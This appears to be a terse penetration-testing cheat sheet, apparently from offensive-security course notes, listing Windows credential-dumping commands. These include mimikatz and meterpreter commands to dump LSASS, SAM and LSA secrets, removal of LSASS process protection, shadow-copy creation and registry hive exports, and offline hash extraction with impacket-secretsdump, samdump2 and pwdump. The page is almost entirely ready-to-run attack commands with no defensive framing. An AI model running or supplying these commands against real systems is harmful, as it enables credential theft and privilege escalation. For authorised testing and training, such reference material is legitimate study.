Last updated 9 months ago
whoami /user
privilege::debug token::elevate !+ !processprotect /process:lsass.exe /remove sekurlsa::credman lsadump::sam lsadump::secrets
privilege::debug lsadump::lsa /patch
lsadump::lsa /inject
meterpreter > hashdump meterpreter > load kiwi meterpreter > creds_all meterpreter > lsa_dump_sam meterpreter > lsa_dump_secrets
wmic shadowcopy call create Volume='C:\'
vssadmin list shadows
reg save HKLM\sam C:\users\offsec.corp1\Downloads\sam reg save HKLM\system C:\users\offsec.corp1\Downloads\system
impacket-secretsdump -system SYSTEM -sam SAM LOCAL samdump2 SYSTEM SAM python pwdump.py /home/kali/system /home/kali/sam
$env:computername [wmi] "Win32_userAccount.Domain='',Name='Administrator'"
S-1-5-21--
copy \\? C:\users\offsec.corp1\Downloads\sam copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\offsec.corp1\Downloads\system
